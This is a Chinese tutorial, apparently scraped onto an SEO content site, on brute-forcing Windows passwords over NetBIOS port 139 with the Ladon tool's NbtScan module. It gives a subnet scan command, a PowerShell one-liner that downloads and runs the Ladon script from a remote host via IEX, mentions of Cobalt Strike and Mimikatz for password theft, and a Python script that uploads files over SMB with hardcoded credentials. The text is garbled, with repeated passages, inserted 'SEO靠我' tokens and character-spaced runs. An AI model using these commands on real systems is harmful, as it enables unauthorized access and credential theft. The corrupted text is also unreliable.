解决方案

〖教程〗NbtScan 139端口弱口令-Netbios密码爆破

seo靠我 2023-09-25 06:28:06

版本

Ladon >= 7.1

139端口

NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows"文件和打印机SEO靠我共享"和SAMBA。

IPC$通信

Windows系统中的net use ipc 整 个 通 信 过 程 , 先 445 − > 137 − > 139 验 证 , 当 你 开 启 防 火 墙 禁 用 4SEO靠我45 , 发 现 系 统 命 令 就 无 法 连 接 I P C 了 , 根 本 没 机 会 走 到 139 , 所 以 使 用 系 统 自 带 命 令 连 接 的 i p c 整个通信过程,先445SEO靠我->137->139验证,当你开启防火墙禁用445,发现系统命令就无法连接IPC了,根本没机会走到139,所以使用系统自带命令连接的ipc 整个通信过程,先445−>137−>139验证,当你开启防火SEO靠我墙禁用445,发现系统命令就无法连接IPC了,根本没机会走到139,所以使用系统自带命令连接的ipc需要同时开启这些端口。说入侵139就是IPC 的 说 法 是 错 误 的 , 就 像 说 w m iSEO靠我 e x e c . v b s 可 完 全 替 代 P S E X E C 工 具 一 样 , 这 个 脚 本 需 要 目 标 开 启 135 和 445 , 因 为 它 通 过 445 来 传 输SEO靠我 结 果 , 意 味 着 目 标 只 开 放 135 这 个 V B S 的 回 显 就 没 有 了 , 其 实 假 设 目 标 只 开 放 445 , 这 个 V B S 脚 本 还 能 执 行 命SEO靠我 令 吗 ? 哪 来 的 替 代 或 扔 掉 ? 这 个 系 统 的 I P C 的说法是错误的,就像说wmiexec.vbs可完全替代PSEXEC工具一样,这个脚本需要目标开启135和445,因为它SEO靠我通过445来传输结果,意味着目标只开放135这个VBS的回显就没有了,其实假设目标只开放445,这个VBS脚本还能执行命令吗?哪来的替代或扔掉?这个系统的IPC 的说法是错误的,就像说wmiexec.SEO靠我vbs可完全替代PSEXEC工具一样,这个脚本需要目标开启135和445,因为它通过445来传输结果,意味着目标只开放135这个VBS的回显就没有了,其实假设目标只开放445,这个VBS脚本还能执行命SEO靠我令吗?哪来的替代或扔掉?这个系统的IPC连接也是同理,测试首先得把其它端口禁了再说话。虽然系统自带命令需要同时开启,但是 自己实现SMB服务器的话是可以只使用139或只用445端口的,详情参考impaSEO靠我cket。

Nbt爆破

系统自带命令需要同时开启139和445,但是 自己实现SMB服务器的话是可以只使用139或只用445端口的。系统的IPC 就 像 读 取 系 统 密 码 一 样 , 可 以 先 植SEO靠我 入 C S 再 用 M I M I 插 件 读 取 , 但 是 我 们 也 可 以 不 使 用 C S , 直 接 M I M I 读 取 密 码 啊 。 基 于 和 M I M I 可 以 独 立SEO靠我 读 取 密 码 的 原 理 , 反 向 思 路 我 们 也 可 以 完 全 不 走 445 , 直 接 通 过 139 验 证 W I N D O W S 密 码 , 所 以 这 个 和 I P CSEO靠我 就像读取系统密码一样,可以先植入CS再用MIMI插件读取,但是我们也可以不使用CS,直接MIMI读取密码啊。基于和MIMI可以独立读取密码的原理,反向思路我们也可以完全不走445,直接通过139验证SEO靠我WINDOWS密码,所以这个和IPC 就像读取系统密码一样,可以先植入CS再用MIMI插件读取,但是我们也可以不使用CS,直接MIMI读取密码啊。基于和MIMI可以独立读取密码的原理,反向思路我们也可SEO靠我以完全不走445,直接通过139验证WINDOWS密码,所以这个和IPC不一样(指的是系统命令连接的ipc),所以为了防止大家误解,起名为NbtScan。毕竟走的也是Netbios,系统IPC$验证一SEO靠我是时间非常久,且必须开启445,如果445都开了为何不用SmbScan验证密码呢?但是由于近几年勒索病毒横行,可能很多机器默认会关闭445,所以会导致无法通过445验证密码,但是没关系还有139啊。

LSEO靠我adon

139端口 Netbios密码爆破(Windows)

Ladon 192.168.1.8/24 NbtScan

PowerLadon

远程加载NbtScan 139端口弱口令爆破

powershellSEO靠我 “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon7.1_all.ps1’); Ladon 19SEO靠我2.168.1.141 NbtScan”

139传输文件

#!/usr/bin/env python #coding:utf-8from smb.SMBConnection import SEO靠我SMBConnection from nmb.NetBIOS import NetBIOS import os,sys def getBIOSName(SEO靠我remote_smb_ip, timeout=30):try:bios = NetBIOS()srv_name = bios.queryIPForName(remote_smb_ip, timeoutSEO靠我=timeout)except:print >> sys.stderr, "Looking up timeout, check remote_smb_ip again!!"finally:bios.cSEO靠我lose()return srv_name serverip=192.168.1.40 conn = SMBConnection(k8gege, k8gege520, SEO靠我C$,getBIOSName(serverip)[0], use_ntlm_v2 = True) assert conn.connect(serverip, 139) SEO靠我#temdir=/ #dir=os.path.join(/,public) f = open(C:/123.txt, rb) conn.storeFilSEO靠我e(Users,234.txt,f) f.close()

工具下载

最新版本:https://k8gege.org/Download

历史版本: https://github.com/k8gSEO靠我ege/Ladon/releases
“SEO靠我”的新闻页面文章、图片、音频、视频等稿件均为自媒体人、第三方机构发布或转载。如稿件涉及版权等问题,请与 我们联系删除或处理,客服邮箱:html5sh@163.com,稿件内容仅为传递更多信息之目的,不代表本网观点,亦不代表本网站赞同 其观点或证实其内容的真实性。

网站备案号:浙ICP备17034767号-2